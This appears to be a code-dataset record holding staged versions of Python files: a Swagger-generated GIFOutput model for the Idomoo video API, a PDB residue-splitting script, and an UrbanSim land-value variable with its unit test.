"step-4": "<mask token>\n\n\nclass GIFOutput(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {'gif_fps': 'float', 'color_depth': 'float', 'gif_loop':\n 'int', 'height': 'float', 'start': 'float', 'duration': 'float',\n 'suffix': 'str', 'overlay': 'str', 'overlay_alignment': 'list[str]',\n 'overlay_scale': 'str', 'label': 'str'}\n attribute_map = {'gif_fps': 'gif_fps', 'color_depth': 'color_depth',\n 'gif_loop': 'gif_loop', 'height': 'height', 'start': 'start',\n 'duration': 'duration', 'suffix': 'suffix', 'overlay': 'overlay',\n 'overlay_alignment': 'overlay_alignment', 'overlay_scale':\n 'overlay_scale', 'label': 'label'}\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-5": "# coding: utf-8\n\n\"\"\"\n Idomoo API\n\n\n\n OpenAPI spec version: 2.0\n Contact: dev.support@idomoo.com\n\n\"\"\"\n\n\nimport pprint\n\nimport six\n\n\nclass GIFOutput(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'gif_fps': 'float',\n 'color_depth': 'float',\n 'gif_loop': 'int',\n 'height': 'float',\n 'start': 'float',\n 'duration': 'float',\n 'suffix': 'str',\n 'overlay': 'str',\n 'overlay_alignment': 'list[str]',\n 'overlay_scale': 'str',\n 'label': 'str'\n }\n\n attribute_map = {\n 'gif_fps': 'gif_fps',\n 'color_depth': 'color_depth',\n 'gif_loop': 'gif_loop',\n 'height': 'height',\n 'start': 'start',\n 'duration': 'duration',\n 'suffix': 'suffix',\n 'overlay': 'overlay',\n 'overlay_alignment': 'overlay_alignment',\n 'overlay_scale': 'overlay_scale',\n 'label': 'label'\n }\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None, height=None, start=None, duration=None,\n suffix=None, overlay=None, overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\"Invalid value for `gif_fps`, must be a value less than or equal to `30`\")\n\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\"Invalid value for `gif_loop`, must be a value greater than or equal to `-1`\")\n\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError(\"Invalid value for `height`, must not be `None`\")\n\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError(\"Invalid value for `start`, must not be `None`\")\n\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = [\"left\", \"center\", \"right\", \"top\", \"middle\", \"bottom\"]\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n \"Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]\"\n .format(\", \".join(map(str, set(overlay_alignment) - set(allowed_values))),\n \", \".join(map(str, allowed_values)))\n )\n\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = [\"fit\", \"fill\", \"none\"]\n if overlay_scale not in allowed_values:\n raise ValueError(\n \"Invalid value for `overlay_scale` ({0}), must be one of {1}\"\n .format(overlay_scale, allowed_values)\n )\n\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-ids": [
27,
28,
29,
31,
33
]
}
|
[
27,
28,
29,
31,
33
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for l in pdb:
if not l.startswith('ATOM'):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res) - 2):
outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')
for r in res[i:i + 3]:
for j in r:
print >> outp, j
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith('ATOM'):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res) - 2):
outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')
for r in res[i:i + 3]:
for j in r:
print >> outp, j
<|reserved_special_token_1|>
import sys
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith('ATOM'):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res) - 2):
outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')
for r in res[i:i + 3]:
for j in r:
print >> outp, j
<|reserved_special_token_1|>
import sys
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith("ATOM"):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res)-2):
outp = open("%s%d-%dr.pdb"%(name,i+1,i+3), "w")
for r in res[i:i+3]:
for j in r:
print >> outp, j,
|
flexible
|
{
"blob_id": "d867d17b2873de7c63d0ff29eb585cce1a68dda6",
"index": 6081,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-3": "<mask token>\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-4": "import sys\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-5": "import sys\n\npdb = open(sys.argv[1])\nname = sys.argv[2]\n\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith(\"ATOM\"):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\n\nfor i in range(len(res)-2):\n outp = open(\"%s%d-%dr.pdb\"%(name,i+1,i+3), \"w\")\n for r in res[i:i+3]:\n for j in r:\n print >> outp, j,\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.variables.variable import Variable
from variable_functions import my_attribute_label
class total_land_value_if_in_plan_type_group_SSS(Variable):
"""Sum of land values of locations if in plan_type_group SSS, 0 otherwise."""
def __init__(self, group):
self.group = group
Variable.__init__(self)
def dependencies(self):
return [my_attribute_label("is_in_plan_type_group_%s" % self.group),
my_attribute_label("total_land_value")]
def compute(self, dataset_pool):
return self.get_dataset().get_attribute("is_in_plan_type_group_%s" % self.group) * \
self.get_dataset().get_attribute("total_land_value")
def post_check(self, values, dataset_pool):
self.do_check("x >= 0", values)
from opus_core.tests import opus_unittest
from opus_core.tests.utils.variable_tester import VariableTester
from numpy import array
class Tests(opus_unittest.OpusTestCase):
def test_my_inputs(self):
total_land_value = array([100, 200, 300])
is_in_plan_type_group_residential = array([1, 0, 1])
tester = VariableTester(
__file__,
package_order=['urbansim'],
test_data={
"gridcell":{
"grid_id":array([1,2,3]),
"total_land_value":total_land_value,
"is_in_plan_type_group_residential":is_in_plan_type_group_residential
}
}
)
should_be = array([100, 0, 300])
instance_name = "urbansim.gridcell.total_land_value_if_in_plan_type_group_residential"
tester.test_is_equal_for_family_variable(self, should_be, instance_name)
if __name__=='__main__':
opus_unittest.main()
|
normal
|
{
"blob_id": "52bb10e19c7a5645ca3cf91705b9b0affe75f570",
"index": 4764,
"step-1": "<mask token>\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n <mask token>\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n <mask token>\n\n\n<mask token>\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n <mask token>\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n\n def post_check(self, values, dataset_pool):\n self.do_check('x >= 0', values)\n\n\n<mask token>\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n \"\"\"Sum of land values of locations if in plan_type_group SSS, 0 otherwise.\"\"\"\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n\n def post_check(self, values, dataset_pool):\n self.do_check('x >= 0', values)\n\n\n<mask token>\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\nif __name__ == '__main__':\n opus_unittest.main()\n",
"step-4": "from opus_core.variables.variable import Variable\nfrom variable_functions import my_attribute_label\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n \"\"\"Sum of land values of locations if in plan_type_group SSS, 0 otherwise.\"\"\"\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n\n def post_check(self, values, dataset_pool):\n self.do_check('x >= 0', values)\n\n\nfrom opus_core.tests import opus_unittest\nfrom opus_core.tests.utils.variable_tester import VariableTester\nfrom numpy import array\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\nif __name__ == '__main__':\n opus_unittest.main()\n",
